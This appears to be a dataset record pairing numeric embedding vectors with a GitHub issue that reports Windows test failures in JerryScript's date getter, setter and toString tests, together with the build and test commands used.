0.005046172067523003, 0.008368173614144325, -0.0019118229392915964, 0.0065511055290699005, -0.006818649359047413, -0.028166409581899643, 0.0013209972530603409, -0.010991588234901428, -0.014164954423904419, -0.03006894327700138, 0.0036211302503943443, -0.004355017561465502, -0.01475206483155489, 0.018564563244581223, -0.02629360370337963, 0.005655577406287193, 0.01640934869647026, 0.012373898178339005, 0.004956990946084261, -0.0012234551832079887, 0.007554394658654928, 0.008345878683030605, -0.01085781678557396, -0.016349894925951958, 0.01822270080447197, -0.03701021894812584, -0.010679454542696476, -0.004563107155263424, -0.0024822114501148462, -0.017256570979952812, -0.00433643814176321, 0.030128397047519684, -0.006926410365849733, 0.0022016619332134724, -0.003526375163346529, -0.01804433949291706, -0.018148383125662804, -0.007591553498059511, -0.00906675960868597, 0.00925255473703146, -0.023930301889777184, 0.01743493415415287, -0.0040763262659311295, 0.00867287628352642, -0.012254989705979824, -0.02922172099351883, -0.007617564871907234, -0.006993296090513468, -0.007223681081086397, 0.000500715512316674, -0.015168244019150734, -0.010419342666864395, 0.025832833722233772, -0.009639006108045578, -0.000016677937310305424, 0.015309447422623634, 0.006696025375276804, 0.01734575256705284, 0.0017585427267476916, 0.018951015546917915, -0.006517662666738033, 0.00715307891368866, -0.007149363402277231, -0.0034371938090771437, 0.007301714736968279, 0.00139252794906497, -0.004132064525038004, 0.024272162467241287, 0.011043610982596874, -0.002279695589095354, -0.013094780035316944, -0.0202292799949646, 0.004633708856999874, 0.010686886496841908, 0.0065659694373607635, 0.015190538950264454, -0.012648873031139374, -0.0012020888971164823, -0.0031232016626745462, -0.01368188951164484, -0.0014055336359888315, -0.025951743125915527, 0.0025007908698171377, -0.003502221778035164, -0.009178237058222294, 0.00827156100422144, 0.020006326958537102, -0.021611588075757027, 0.006235255394130945, 0.007309146225452423, -0.015183106996119022, -0.020333323627710342, 0.02358843944966793, 0.013488663360476494, 0.010263275355100632, -0.008836375549435616, 0.00022341760632116348, 0.0062203919515013695, -0.00880664773285389, -0.010523387230932713, 0.019307740032672882, -0.00820467434823513, 0.0052951364777982235, -0.006777774542570114, 0.005532952956855297, 0.000660963065456599, 0.042153000831604004, 0.027438096702098846, -0.0029782820492982864, 0.006432197522372007, 0.007825654000043869, 0.00763242831453681, 0.00974305160343647, -0.002316854428499937, -0.00007454994920408353, 0.0026865850668400526, 0.023737074807286263, -0.005540384911000729, 0.03061889484524727, -0.00806347094476223, -0.0040763262659311295, -0.0180889293551445, 0.002922543790191412, 0.019040195271372795, 0.002783198142424226, -0.015019608661532402, 0.012440783903002739, 0.01062743179500103, 0.007004443556070328, -0.013235983438789845, -0.027765095233917236, -0.009876823052763939, 0.009200531989336014, 0.022874990478157997, 0.009676164947450161, -0.00004006188828498125, 0.0031863716430962086, 0.01789570413529873, -0.02042250521481037, 0.02679896540939808, -0.018059201538562775, -0.0016963016241788864, -0.020957592874765396, -0.01377107109874487, -0.004689447116106749, 0.02112109214067459, 0.025788243860006332, -0.033115968108177185, 0.029385220259428024, 0.0053062839433550835, -0.008605990558862686, -0.01134831365197897, 0.00234843953512609, -0.0007236686651594937, 0.00299500348046422, 0.0062835621647536755, -0.008167515508830547, -0.017538977786898613, -0.025951743125915527, -0.0043698810040950775, 0.006198096554726362, -0.0003358231333550066, -0.002534233732149005, 0.011006452143192291, 0.010523387230932713, -0.03326460346579552, -0.0101146399974823, -0.026159832254052162, -0.002393030095845461, -0.0026289888191968203, 0.0022239573299884796, 0.023647893220186234, -0.010954429395496845, -0.015651308000087738, -0.008992441929876804, -0.001351653249002993, 0.0006205528625287116, -0.008338446728885174, -0.023573575541377068, -0.022904716432094574, -0.012009740807116032, 0.0006154435104690492, -0.017732204869389534, -0.0028017775621265173, -0.01099902018904686, 0.015785081312060356, 0.012812372297048569, -0.004667151719331741, -0.0026494262274354696, -0.01503447163850069, -0.0048009236343204975, -0.0018087071366608143, -0.006465640384703875, -0.009750482626259327, -0.003171507967635989, -0.01132601872086525, -0.005109342280775309, -0.008910693228244781, -0.029667627066373825, 0.00029239372815936804, 0.00012935925042256713, 0.016884982585906982, -0.0005048959283158183, 0.007461497560143471, -0.0283447727560997, 0.01380079798400402, -0.011184814386069775, 0.017925430089235306, 0.0021645030938088894, -0.007353737019002438, -0.001212307601235807, 0.008093197830021381, -0.01487097330391407, -0.008970146998763084, -0.022488538175821304, -0.019263150170445442, 0.010820657946169376, -0.00976534653455019, -0.009564688429236412, -0.004945843480527401, 0.028835270553827286, 0.004975570365786552, 0.003310853848233819, 0.02046709693968296, 0.03626703843474388, -0.0033127116039395332, -0.0010980441002175212, 0.0036527151241898537, 0.006346731912344694, -0.024316752329468727, 0.0008811292937025428, -0.008947852067649364, -0.0012801224365830421, 0.007624996360391378, 0.0020901854149997234, 0.004262120462954044, -0.03272951766848564, -0.012240125797688961, -0.011288859881460667, -0.013756207190454006, -0.02125486359000206, 0.0013052046997472644, 0.00636159535497427, 0.021789951249957085, -0.010902407579123974, 0.005696452222764492, -0.00591940525919199, 0.012886689975857735, 0.017182253301143646, -0.003920258954167366, 0.02452484332025051, 0.007435486651957035, 0.019010469317436218, 0.0024784954730421305, -0.013496095314621925, -0.017316024750471115, 0.005484646651893854, -0.011192246340215206, 0.0062464033253490925, -0.014908132143318653, -0.008776920847594738, -0.01004775334149599, 0.00756182661280036, -0.0036248459946364164, 0.02311280556023121, -0.016572847962379456, -0.024762660264968872, -0.010515955276787281, -0.011571266688406467, 0.019887417554855347, 0.011712470091879368, -0.008821511641144753, -0.0015476662665605545, -0.004436767194420099, -0.002673579379916191, 0.002567676827311516, 0.004886389244347811, 0.024123527109622955, -0.0019712771754711866, -0.013042757287621498, -0.01621612347662449, -0.018445653840899467, 0.03320515155792236, 0.011437495239078999, 0.006617991719394922, -0.008100629784166813, 0.007480076979845762, -0.007966858334839344, 0.002069748006761074, -0.010174093768000603, -0.02922172099351883, 0.014841245487332344, -0.01682552881538868, -0.00853167288005352, -0.0016953726299107075, 0.01953069306910038, -0.0020140097476541996, -0.00292440177872777, 0.003424188354983926, 0.014298726804554462, 0.00603831373155117, 0.018103793263435364, 0.021745361387729645, -0.0019396920688450336, -0.001852368819527328, 0.01120711024850607, -0.01235160231590271, -0.008056038990616798, -0.024554569274187088, 0.008940420113503933, 0.021225135773420334, 0.005469783209264278, -0.02069004997611046, -0.002352155279368162, 0.01584453508257866, 0.018490245565772057, 0.020154962316155434, -0.0030172988772392273, -0.0022964170202612877, -0.010932134464383125, 0.016201259568333626, -0.005536668933928013, -0.012916416861116886, 0.006774059031158686, -0.004083757754415274, 0.009772778488695621, -0.008791784755885601, -0.005960280075669289, -0.015443218871951103, -0.0036192722618579865, -0.02419784478843212, 0.006736900191754103, -0.018430791795253754, -0.009609279222786427, -0.015220265835523605, 0.007115920074284077, -0.012641442008316517, -0.005536668933928013, -0.01475206483155489, 0.013302869163453579, -0.0017000174848362803, 0.011504380963742733, -0.026590874418616295, -0.006666298024356365, -0.008070902898907661, -0.00857626274228096, 0.01892128773033619, 0.0034371938090771437, -0.00677034305408597, 0.0026419945061206818, -0.0061349268071353436, -0.011407767422497272, 0.0013609429588541389, -0.015079062432050705, -0.017955157905817032, 0.018951015546917915, -0.013719048351049423, -0.0011621430749073625, -0.007112204562872648, -0.006376459263265133, -0.034096963703632355, -0.007558110635727644, -0.008464786224067211, -0.04060719534754753, 0.0028649475425481796, 0.010582841001451015, -0.004782344214618206, -0.004028019495308399, 0.00925255473703146, -0.022815534844994545, 0.006662582512944937, 0.02149268053472042, -0.0004928192938677967, 0.01209892239421606, -0.006138642318546772, -0.0024116095155477524, 0.009193100035190582, 0.004596550017595291, -0.01466288324445486, -0.01034502498805523, 0.012262421660125256, -0.011415199376642704, -0.000014950632248655893, -0.013117074966430664, -0.0049384115263819695, -0.005900825839489698, 0.03534550219774246, 0.01377107109874487, 0.01776193082332611, 0.010575409047305584, -0.0003530090907588601, -0.011823946610093117, 0.0062835621647536755, 0.004343870095908642, -0.014952722005546093, 0.014536542817950249, -0.008940420113503933, 0.01673634722828865, -0.012983303517103195, -0.009705892764031887, -0.007004443556070328, 0.004191518761217594, 0.018936151638627052, -0.009103918448090553, 0.0012355318758636713, -0.004525948315858841, 0.01706334576010704, 0.015108789317309856, -0.019842827692627907, 0.0073648844845592976, -0.013927138410508633, 0.01868347078561783, 0.014900700189173222, 0.005971427541226149, -0.008174947462975979, 0.012708327732980251, -0.014945290982723236, 0.007093625143170357, 0.005020161159336567, -0.006424765568226576, -0.001643350231461227, 0.01218810398131609, 0.0017343894578516483, -0.0076027014292776585, 0.01465545129030943, -0.009222826920449734, 0.012552260421216488, 0.007297998759895563, 0.007706745993345976, 0.01571076363325119, 0.003998292610049248, 0.0340375080704689, -0.012106354348361492, -0.006090336013585329, -0.004381028935313225, 0.004191518761217594, -0.02042250521481037, 0.0173011627048254, -0.0016108362469822168, -0.01785111241042614, 0.00009498731378698722, 0.02074950374662876, 0.036564312875270844, -0.0005011800094507635, -0.022815534844994545, 0.009215395897626877, 0.01776193082332611, 0.021477816626429558, -0.006926410365849733, 0.011273995973169804, -0.00213849195279181, 0.014090636745095253, -0.0031845136545598507, 0.002093901392072439, -0.005755906458944082, -0.004611413460224867, -0.014536542817950249, 0.013555549085140228, 0.021462952718138695, 0.0026587159372866154, -0.010991588234901428, 0.015814807265996933, 0.022206129506230354, -0.00014062302943784744, 0.01863888092339039, -0.0010878253960981965, -0.030886437743902206, 0.0013005598448216915, 0.028047502040863037, 0.002749755047261715, 0.0005782846710644662, -0.0210170466452837, 0.010597704909741879, -0.008880965411663055, 0.00869517121464014, -0.010055185295641422, -0.003526375163346529, -0.014789223670959473, 0.006428481545299292, -0.006811217870563269, 0.014142659492790699, -0.006562253460288048, 0.00892555620521307, -0.0048752413131296635, 0.024257298558950424, 0.008122925646603107, 0.011177382431924343, 0.005952848121523857, -0.0006154435104690492, 0.014603429473936558, 0.001319139264523983, -0.03706967085599899, -0.008710035122931004, 0.00953496154397726, 0.006684877444058657, -0.001893243519589305, -0.017449798062443733, -0.015651308000087738, 0.0008370031719096005, -0.005819076206535101, -0.009631575085222721, -0.004120916593819857, 0.02177508734166622, 0.010285570286214352, 0.024628886952996254, -0.0007376032299362123, 0.0017891987226903439, -0.01379336602985859, 0.01479665469378233, -0.005380602087825537, -0.004381028935313225, -0.0066774459555745125, 0.0009837805991992354, 0.010359887965023518, 0.014491952955722809, 0.01125913206487894, -0.005072183441370726, 0.001247608452104032, 0.002524944022297859, -0.010248411446809769, -0.009081623516976833, 0.012425919994711876, 0.001999146305024624, -0.00831615086644888, 0.010694317519664764, 0.0057893493212759495, -0.008390468545258045, -0.016513394191861153, -0.010166661813855171, 0.0010032890131697059, -0.002162645338103175, -0.00342047237791121, -0.027289461344480515, 0.009683596901595592, 0.008910693228244781, 0.016156669706106186, -0.023558713495731354, 0.0038310775998979807, 0.027616459876298904, -0.03769394010305405, -0.03198634088039398, -0.010129502974450588, 0.0032253884710371494, -0.009126214310526848, 0.002162645338103175, 0.02003605291247368, 0.008658012375235558, 0.005692736245691776, 0.010842952877283096, -0.003702879650518298, -0.00037855582195334136, -0.0031603605020791292, 0.012812372297048569, -0.0004932837910018861, -0.009148509241640568, -0.002064174273982644, 0.0007650078623555601, -0.01719711720943451, 0.00010758649295894429, 0.002803635550662875, 0.004685731139034033, 0.013325165025889874, 0.020169824361801147, -0.015398629009723663, -0.025520700961351395, -0.012321875430643559, -0.033026788383722305, 0.004644856788218021, 0.004020588006824255, 0.007781063672155142, -0.01013693492859602, -0.0003193338925484568, -0.015547264367341995, 0.010753772221505642, 0.005217102821916342, 0.011162519454956055, -0.004830650985240936, 0.020065780729055405, -0.004317858722060919, 0.006064324639737606, 0.013340028002858162, -0.01062743179500103, 0.0346023254096508, 0.029682490974664688, -0.013726480305194855, -0.0029634186066687107, -0.03751557692885399, 0.004525948315858841, 0.018029475584626198, 0.008769488893449306, -0.011266564019024372, -0.005770769901573658, -0.04048828408122063, 0.0051279217004776, 0.011645584367215633, -0.028537997975945473, 0.0010646011214703321, -0.004462778102606535, 0.0017566847382113338, -0.019322603940963745, 0.018356474116444588, 0.0019211126491427422, 0.010196389630436897, 0.0034706369042396545, -0.021225135773420334, 0.014268998987972736, -0.00026336335577070713, 0.0112145422026515, -0.008078334853053093, -0.024465389549732208, 0.014536542817950249, 0.014291294850409031, -0.0037530441768467426, 0.009750482626259327, -0.00806347094476223, -0.03626703843474388, 0.009468075819313526, -0.005852519068866968, 0.02572879008948803, -0.009876823052763939, 0.0031473548151552677, 0.021433226764202118, -0.004797207657247782, 0.009847096167504787, -0.006487935781478882, 0.004782344214618206, -0.013146801851689816, 0.0028073512949049473, -0.006264982745051384, -0.0010125787230208516, 0.015131085179746151, -0.019337467849254608, 0.0015411634230986238, -0.015294583514332771, -0.00792226754128933, 0.004302995279431343, 0.0002893745549954474, 0.01715252548456192, -0.016528258100152016, -0.014157522469758987, -0.01085781678557396, 0.008985010907053947, 0.004128348547965288, -0.014439930208027363, -0.004603981971740723, -0.004291847348213196, -0.003099048277363181, 0.014529111795127392, -0.005681588780134916, 0.0009754198836162686, -0.009899117983877659, 0.024628886952996254, -0.016884982585906982, 0.004343870095908642, -0.030098671093583107, 0.02522342838346958, -0.00421752966940403, -0.019367193803191185, -0.0034799266140908003, 0.016305305063724518, -0.0039053955115377903, -0.0075283837504684925, -0.01761329546570778, -0.02945953793823719, 0.011875969357788563, -0.020913003012537956, 0.0015885409666225314, -0.007818222977221012, 0.010642295703291893, 0.008234402164816856, 0.011444926261901855, 0.022265585139393806, 0.00830128788948059, -0.009378894232213497, 0.014551406726241112, 0.0234398040920496, 0.013622435741126537, 0.006369027309119701, 0.014514247886836529, 0.003063747426494956, -0.003676868509501219, 0.01339948270469904, 0.023246578872203827, 0.006105199456214905, 0.021403498947620392, 0.00008831033483147621, 0.013094780035316944, 0.023662757128477097, -0.008851238526403904, 0.010523387230932713, 0.004176654852926731, 0.009423485025763512, 0.0005113987135700881, 0.0019415500573813915, 0.016230987384915352, 0.012663736939430237, 0.022726355120539665, 0.00904446467757225, -0.003197519341483712, 0.0009837805991992354, 0.0018960305023938417, 0.0022258153185248375, 0.0007984508411027491, 0.007379747927188873, 0.0012773355701938272, -0.007268271408975124, 0.005495794117450714, 0.009891686961054802, -0.019456375390291214, 0.016022896394133568, -0.003556102281436324, 0.0013284289743751287, 0.012262421660125256, -0.022681763395667076, 0.0183713361620903, 0.01148951705545187, 0.003875668393447995, -0.013555549085140228, -0.008732330054044724, -0.00012413378863129765, 0.018014611676335335, 0.006201812531799078, -0.026873283088207245, -0.0173011627048254, -0.01924828626215458, 0.0025490974076092243, 0.0000694406044203788, -0.003710311371833086, -0.000021613097487716004, -0.012455647811293602, -0.002705164486542344, -0.006792638450860977, -0.000994928297586739, -0.013852820731699467, 0.03264033794403076, -0.00020402533118613064, 0.002957844641059637, 0.02498561330139637, 0.017360616475343704, -0.015041903592646122, 0.009007305838167667, 0.007297998759895563, 0.028077229857444763, -0.005648145452141762, -0.008776920847594738, 0.0008490798063576221, -0.006874387618154287, 0.0016981596127152443, -0.03766421228647232, 0.015398629009723663, -0.018207836896181107, -0.002707022475078702, 0.00999573152512312, 0.016662029549479485, -0.008427627384662628, 0.012574555352330208, -0.023945163935422897, 0.0075506786815822124, 0.012745486572384834, 0.019352329894900322, 0.018846970051527023, 0.004886389244347811, -0.0027014485094696283, 0.005755906458944082, 0.006636571139097214, 0.0065882643684744835, 0.005755906458944082, 0.018148383125662804, -0.007669587153941393, 0.00426583644002676, -0.01501217670738697, -0.0061572217382490635, -0.014484521001577377, 0.01756870560348034, 0.018534835427999496, -0.003035878296941519, -0.02306821569800377, 0.014060909859836102, 0.019932009279727936, 0.006149790249764919, -0.010679454542696476, -0.02009550668299198, 0.018386200070381165, -0.020853547379374504, -0.0075283837504684925, -0.010003163479268551, 0.0017390343127772212, -0.00962414313107729, 0.009780210442841053, -0.02396002784371376, 0.008219538256525993, 0.00506846746429801, 0.011006452143192291, 0.010456501506268978, 0.031153982505202293, 0.016944436356425285, 0.0009192171273753047, -0.015354038216173649, 0.009705892764031887, 0.025669336318969727, -0.001208591740578413, -0.009401190094649792, -0.015294583514332771, 0.00557011179625988, 0.005640713963657618, 0.006985864136368036, 0.018579427152872086, 0.020630594342947006, 0.0062092444859445095, -0.012923848815262318, -0.021076500415802002, 0.014016319066286087, 0.0028370784129947424, 0.02092786505818367, 0.026085514575242996, -0.005477214697748423, -0.009594415314495564, -0.004511084873229265, -0.005020161159336567, -0.004886389244347811, 0.0027256018947809935, 0.010211252607405186, -0.011682743206620216, 0.021923722699284554, 0.021789951249957085, -0.002103191101923585, 0.014818950556218624, 0.010515955276787281, -0.007186522241681814, 0.00256953458301723, 0.019827963784337044, 0.016275577247142792, 0.01454397477209568, 0.01048622839152813, -0.01083552185446024, -0.020808957517147064, 0.019456375390291214, 0.00719023821875453, 0.008524240925908089, 0.012693463824689388, -0.003628561971709132, -0.018386200070381165, 0.015785081312060356, 0.0008634788682684302, 0.02489643171429634, 0.006673729978501797, 0.008368173614144325, -0.009141078218817711, 0.00009167785901809111, 0.014462225139141083, 0.026813827455043793, -0.0003989931719843298, -0.0014696326106786728, -0.001788269728422165, 0.01290898583829403, -0.01244821585714817, -0.012515101581811905, 0.0207940936088562, 0.003812498180195689, -0.015190538950264454, -0.002519370289519429, -0.004622561391443014, 0.0016935147577896714, 0.009549825452268124, -0.004916116129606962, -0.004488789476454258, 0.020987320691347122, 0.017747068777680397, -0.018430791795253754, 0.0029355494771152735, -0.0008741620113141835, -0.007684450596570969, -0.002786913886666298, -0.0004463707155082375, 0.006264982745051384, 0.0025379497092217207, -0.011905696243047714, 0.018475381657481194, -0.01379336602985859, 0.007877676747739315, -0.016721483319997787, -0.003385171527042985, 0.003875668393447995, 0.004518516361713409, -0.0035914031323045492, -0.022116949781775475, -0.020154962316155434, 0.019738782197237015, -0.014432498253881931, 0.007368600461632013, -0.025342337787151337, -0.0019136809278279543, -0.018490245565772057, 0.008405332453548908, 0.012812372297048569, 0.0049012526869773865, -0.0029058223590254784, 0.0016229129396378994, -0.02064545825123787, 0.0020232994575053453, 0.015859398990869522, 0.01575535349547863, 0.0074652135372161865, 0.00476748077198863, -0.004760048817843199, 0.0026271308306604624, -0.0234992578625679, 0.00518737593665719, 0.012879258021712303, 0.005168796516954899, 0.0049272640608251095, 0.008360741659998894, -0.0013386476784944534, 0.009720755741000175, 0.011444926261901855, 0.014841245487332344, 0.010590272955596447, -0.018728062510490417, -0.006123778875917196, 0.0065771169029176235, 0.004771196749061346, -0.012463078834116459, -0.0057261791080236435, -0.013362323865294456, -0.006142358295619488, 0.000480742659419775, -0.01477435976266861, -0.0005759622436016798, -0.012054331600666046, 0.024108663201332092, 0.0006265911506488919, 0.007234828546643257, 0.02149268053472042, 0.013265710324048996, 0.012975871562957764, -0.009913981892168522, -0.016156669706106186, 0.010463932529091835, -0.014298726804554462, -0.00299500348046422, -0.00555896433070302, -0.014588565565645695, -0.04120173677802086, -0.006079188082367182, 0.005217102821916342, -0.007569258101284504, -0.004377312958240509, 0.006907830946147442, 0.00013028823013883084, -0.018861833959817886, 0.005224534776061773, 0.006086620036512613, 0.00976534653455019, 0.012292148545384407, -0.004321574699133635, 0.0036044088192284107, 0.0020493108313530684, 0.013875115662813187, 0.018445653840899467, -0.006424765568226576, 0.011363177560269833, -0.008264129050076008, 0.011950287036597729, 0.014254136011004448, -0.012418488971889019, -0.012968439608812332, 0.009029600769281387, -0.034186143428087234, -0.01911451295018196, 0.013585276901721954, 0.017033617943525314, 0.02190885879099369, 0.013265710324048996, -0.012254989705979824, -0.000555060338228941, -0.01377107109874487, 0.023930301889777184, 0.00391654297709465, 0.0017566847382113338, -0.012619146145880222, 0.014833813533186913, -0.011036179028451443, -0.0027163121849298477, -0.004113485105335712, 0.05645173043012619, -0.0038459412753582, 0.028537997975945473, -0.0018988173687830567, 0.001208591740578413, -0.0006823294097557664, -0.00541776092723012, -0.007420622743666172, 0.004314142744988203, 0.003175223944708705, -0.005882246419787407, 0.0010776066919788718, 0.0173011627048254, -0.00841276440769434, -0.0030544577166438103, -0.0005248687812127173, 0.004239825066179037, -0.006944989785552025, 0.000533229555003345, -0.01687011867761612, -0.022711491212248802, 0.009103918448090553, 0.03240251913666725, -0.015339174307882786, -0.0037196010816842318, -0.006354163866490126, 0.016528258100152016, -0.01195771899074316, 0.012292148545384407, -0.007294282782822847, 0.030306760221719742, -0.008583694696426392, -0.011526675894856453, -0.004585402552038431, 0.00820467434823513, 0.02181967906653881, -0.0015420924173668027, 0.017078207805752754, 0.0015095784328877926, -0.0014761354541406035, -0.004734037909656763, 0.00734258908778429, -0.02503020316362381, 0.0038347935769706964, 0.003957417793571949, 0.004392176400870085, -0.011043610982596874, 0.0045073688961565495, 0.013094780035316944, 0.014841245487332344, 0.005105626303702593, 0.004421903286129236, -0.008873534388840199, 0.016483666375279427, -0.009549825452268124, 0.01701875403523445, 0.011913128197193146, -0.01678093709051609, -0.016230987384915352, -0.016468804329633713, -0.01174962893128395, -0.008977578952908516, -0.008189811371266842, -0.015138516202569008, -0.021061638370156288, 0.003069321159273386, 0.014722337014973164, 0.024777522310614586, -0.01001802645623684, 0.03353215008974075, 0.0037939187604933977, 0.005514373537153006, -0.01957528293132782, -0.00103394512552768, -0.0015931858215481043, -0.010709181427955627, 0.01734575256705284, 0.006974716670811176, 0.011296290904283524, 0.009601847268640995, -0.0015634587034583092, -0.007647291757166386, 0.018490245565772057, -0.005670440848916769, -0.007115920074284077, -0.00720138568431139, -0.011340881697833538, 0.0010562404058873653, -0.020169824361801147, 0.009802505373954773, 0.020348187536001205, -0.000801237765699625, -0.01380079798400402, -0.010738908313214779, 0.018237564712762833, -0.001995430327951908, 0.00022248862660489976, -0.010181525722146034, -0.0000627636254648678, 0.005150217097252607, 0.017702477052807808, 0.013347459957003593, -0.01863888092339039, 0.010709181427955627, 0.024078937247395515, 0.008851238526403904, 0.011452358216047287, -0.014164954423904419, 0.0007255265954881907, 0.005778201390057802, 0.02171563357114792, -0.011675311252474785, -0.014997312799096107, 0.013994024135172367, 0.023320896551012993, 0.006892967037856579, -0.005622134543955326, 0.0020177257247269154, 0.01798488385975361, 0.004028019495308399, -0.016513394191861153, -0.014759495854377747, 0.0377533957362175, 0.018936151638627052, 0.01209892239421606, -0.009051896631717682, -0.007286850828677416, 0.0175241157412529, 0.0036545731127262115, 0.0012503954349085689, -0.012901553884148598, -0.012485374696552753, 0.01682552881538868, 0.009839664213359356, -0.01961987465620041, 0.011920560151338577, -0.010359887965023518, 0.025580154731869698, 0.021358909085392952, -0.0032997061498463154, -0.005016445182263851, 0.03980456292629242, -0.008591126650571823, 0.00671088881790638, -0.015785081312060356, 0.025788243860006332, -0.01132601872086525, 0.018445653840899467, -0.022666899487376213, -0.005577543750405312, 0.003946270328015089, 0.026115242391824722, 0.014670315198600292, 0.005636997986584902, -0.00277948216535151, -0.0060457452200353146, 0.00039759970968589187, 0.015606718137860298, 0.0035486703272908926, -0.01206919550895691, 0.004511084873229265, 0.0017641165759414434, 0.00555896433070302, 0.011065905913710594, 0.005555248353630304, 0.0018653743900358677, 0.0010831805411726236, -0.003632277948781848, 0.015249992720782757, 0.0007148434524424374, -0.032699789851903915, 0.0015216550091281533, 0.00030214793514460325, -0.008353309705853462, 0.014863541349768639, 0.013273142278194427, 0.014595997519791126, -0.0019489817786961794, 0.007966858334839344, 0.0054326243698596954, 0.014729768969118595, -0.0037233170587569475, -0.015249992720782757, 0.0175241157412529, 0.04610670357942581, 0.0004900323692709208, -0.008241833187639713, -0.0039648497477173805, 0.01822270080447197, -0.00816008448600769, -0.0007919480558484793, -0.022429084405303, 0.0012336738873273134, -0.003957417793571949, -0.007959426380693913, 0.010612567886710167, 0.007524667773395777, 0.005012729205191135, 0.01599317044019699, -0.00432529067620635, 0.006684877444058657, -0.02801777422428131, -0.008442491292953491, 0.013429209589958191 ]
233
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
``` [ 35/ 545] FAIL (3221226505): tests\jerry\date-getters.js ================================================ Script Error: assertion failed ================================================ [ 37/ 545] FAIL (3221226505): tests\jerry\date-setters.js ================================================ Script Error: assertion failed ================================================ [ 40/ 545] FAIL (3221226505): tests\jerry\date-tostring.js ``` ###### JerryScript revision b1f73e698af4b422c19c38290bb49cb434611e9e ###### Build platform indows-10-10.0.19041-SP0 ###### Build steps ``` Build command: cmd \ /S \ /C \ C:\hostedtoolcache\windows\Python\3.7.9\x64\python.exe \ D:\a\jerryscript\jerryscript\tools\build.py \ --lto=off \ --profile=es5.1 \ --stack-limit=96 \ --gc-mark-limit=16 \ --cpointer-32bit=on \ --mem-heap=1024 \ --builddir=D:\a\jerryscript\jerryscript\build\tests\jerry_tests-es5.1-cpointer_32bit \ --install=D:\a\jerryscript\jerryscript\build\tests\jerry_tests-es5.1-cpointer_32bit\local Test command: TZ='UTC' \ cmd \ /S \ /C \ C:\hostedtoolcache\windows\Python\3.7.9\x64\python.exe \ D:\a\jerryscript\jerryscript\tools\runners/run-test-suite.py \ --engine \ D:\a\jerryscript\jerryscript\build\tests\jerry_tests-es5.1-cpointer_32bit\local\bin\jerry.exe \ --test-dir \ D:\a\jerryscript\jerryscript\tests/jerry \ -q \ --skip-list=es.next\ ``` ###### Build log https://github.com/lygstate/jerryscript/runs/1845879129?check_suite_focus=true It's attribute to https://github.com/jerryscript-project/jerryscript/pull/4449
Windows unit tests failed with date-getters.js date-setters.js date-tostring.js
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4571/comments
1
2021-02-06T18:20:09
2021-02-09T18:10:35Z
https://github.com/jerryscript-project/jerryscript/issues/4571
802,758,293
4,571
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Windows unit tests failed with date-getters.js date-setters.js date-tostring.js Issue date: --- start body --- ``` [ 35/ 545] FAIL (3221226505): tests\jerry\date-getters.js ================================================ Script Error: assertion failed ================================================ [ 37/ 545] FAIL (3221226505): tests\jerry\date-setters.js ================================================ Script Error: assertion failed ================================================ [ 40/ 545] FAIL (3221226505): tests\jerry\date-tostring.js ``` ###### JerryScript revision b1f73e698af4b422c19c38290bb49cb434611e9e ###### Build platform indows-10-10.0.19041-SP0 ###### Build steps ``` Build command: cmd \ /S \ /C \ C:\hostedtoolcache\windows\Python\3.7.9\x64\python.exe \ D:\a\jerryscript\jerryscript\tools\build.py \ --lto=off \ --profile=es5.1 \ --stack-limit=96 \ --gc-mark-limit=16 \ --cpointer-32bit=on \ --mem-heap=1024 \ --builddir=D:\a\jerryscript\jerryscript\build\tests\jerry_tests-es5.1-cpointer_32bit \ --install=D:\a\jerryscript\jerryscript\build\tests\jerry_tests-es5.1-cpointer_32bit\local Test command: TZ='UTC' \ cmd \ /S \ /C \ C:\hostedtoolcache\windows\Python\3.7.9\x64\python.exe \ D:\a\jerryscript\jerryscript\tools\runners/run-test-suite.py \ --engine \ D:\a\jerryscript\jerryscript\build\tests\jerry_tests-es5.1-cpointer_32bit\local\bin\jerry.exe \ --test-dir \ D:\a\jerryscript\jerryscript\tests/jerry \ -q \ --skip-list=es.next\ ``` ###### Build log https://github.com/lygstate/jerryscript/runs/1845879129?check_suite_focus=true It's attribute to https://github.com/jerryscript-project/jerryscript/pull/4449 --- end body ---
1,821
[ -0.0005769363488070667, 0.02243971638381481, 0.0031850847881287336, 0.026576003059744835, 0.014664361253380775, 0.001072804327122867, -0.008906708098948002, 0.03657803311944008, -0.026158049702644348, 0.0017934117931872606, 0.014577888883650303, 0.00005111809150548652, 0.01155854295939207, 0.008740968070924282, -0.018159307539463043, 0.01859167218208313, -0.026676887646317482, -0.0030499710701406, -0.01962934620678425, 0.01765488274395466, -0.01759723387658596, 0.04436059296131134, -0.006024278234690428, 0.04620534926652908, -0.013122261501848698, -0.010124534368515015, 0.015925424173474312, -0.0059882476925849915, -0.0030481694266200066, -0.018779030069708824, -0.0018825869774445891, 0.00945436954498291, 0.01886550337076187, -0.02582656964659691, 0.04395705461502075, -0.004525414668023586, 0.03677980229258537, 0.0392298698425293, 0.009295836091041565, -0.02869458869099617, -0.043870579451322556, -0.03758688271045685, -0.013345649465918541, 0.030870823189616203, 0.0036084416788071394, 0.038307491689920425, 0.030236687511205673, 0.0006625084788538516, -0.014044638723134995, 0.00945436954498291, -0.023679159581661224, -0.021747931838035583, 0.008596846833825111, -0.04015224799513817, 0.02215147204697132, 0.0077537358738482, 0.02514920011162758, 0.011630604043602943, -0.014484209008514881, -0.007451080717146397, 0.005134327802807093, -0.01568041741847992, -0.021920878440141678, 0.022007351741194725, 0.017107220366597176, 0.06618058681488037, -0.044821783900260925, 0.053353775292634964, 0.019369928166270256, 0.0008827440906316042, 0.011882816441357136, 0.004298423416912556, 0.043553512543439865, 0.03236968442797661, 0.01189002301543951, -0.05355554446578026, -0.004251583945006132, 0.006943052634596825, -0.028766648843884468, -0.019773468375205994, -0.016112782061100006, 0.000758439302444458, -0.04542709141969681, -0.007332180626690388, 0.007400638423860073, -0.011969289742410183, -0.007933887653052807, -0.06912066787481308, -0.020695844665169716, -0.005613531917333603, 0.00948319397866726, 0.02768573723733425, -0.018793441355228424, -0.05384378880262375, -0.007346592843532562, 0.0020177008118480444, 0.008236543275415897, 0.03066905215382576, -0.06139575317502022, -0.021647047251462936, 0.025178024545311928, -0.010398365557193756, -0.007252913899719715, -0.04306349903345108, 0.02147410251200199, -0.005436982959508896, 0.027267785742878914, -0.02245412766933441, 0.02088320441544056, 0.08249513804912567, 0.009742612950503826, 0.0036066402681171894, -0.007213280536234379, -0.02902606688439846, -0.032456159591674805, 0.01206296868622303, 0.010225419886410236, -0.020739082247018814, 